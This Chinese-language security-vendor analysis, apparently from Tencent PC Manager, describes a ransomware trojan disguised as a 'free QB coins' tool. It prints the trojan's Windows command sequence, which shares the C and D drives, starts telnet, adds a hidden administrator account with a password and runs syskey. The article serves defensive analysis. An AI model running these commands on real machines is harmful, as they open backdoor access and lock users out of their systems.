伪装成“免费领QB”工具的勒索木马

2015-05-12 来源:未知 作者:腾讯电脑管家
【文章摘要】近日,腾讯反病毒实验室捕获一款勒索木马,其通过伪装成“免费领QB”文件在网络社交工具、网络共享盘、下载站进行传播。

近日,腾讯反病毒实验室捕获一款勒索木马,其通过伪装成“免费领QB”文件在网络社交工具、网络共享盘、下载站进行传播。用户一旦下载运行后,将会导致电脑无法进入系统、个人隐私泄漏、磁盘文件被窃取、系统被破坏等安全隐患。


 

据安全专家表示,勒索木马运行后,会禁用当前账户、创建新用户并设置密码、设置访客账户密码、禁用任务管理器、隐藏桌面图标和任务栏、将磁盘设为共享、启动远程登录服务等行为。此外,木马还会在窗口中留下付款方式,要求用户付钱购买开机密码,给用户造成财产损失。

我们来看看该木马的详细分析。
1、通过修改注册表禁用任务管理器


 2、隐藏任务栏


3、隐藏桌面图标



4、依次执行以下命令,破坏系统
net share houmen$=c:\\                                 将c盘设置为共享,并将共享命名为houmen          
net share houmen2$=d:\\                                将d盘设置为共享,并将共享命名为houmen2
net start telnet                                       启动telnet服务
net start Server                                       启动Server服务 
net user Forbidden 1207142187 /add                     新建用户并设置密码
net user Forbidden /active:yes                         启用刚创建的用户
net localgroup Administrators Forbidden /add           将刚创建的账户设为管理员
net user Administrator /active:no                      禁用名为Administrator的账户
tsshutdn                                               关机
dfrg.msc-                                              无效命令
syskey                                                 打开账户数据库加密程序 
iexpress                                               打开IExpress程序,创建自解压文件  
Nslookup                                               查看DNS服务器地址
net share c$ /del                                      关闭C盘默认共享
net stop                                               无效命令 
net user guest 12345                                   将guset账户的密码设置为12345
net password                                           无效命令
iisreset /enable                                       启动IIS服务
iisreset /rebootonerror                                设置IIS:如果发送错误,重启计算机







5、创建全屏窗口,窗口内容如下:主要功能是要求用户联系对方,并支付赎金。


6、目前电脑管家可以有效查杀该木马

电脑管家 V16

全新上线 更轻更快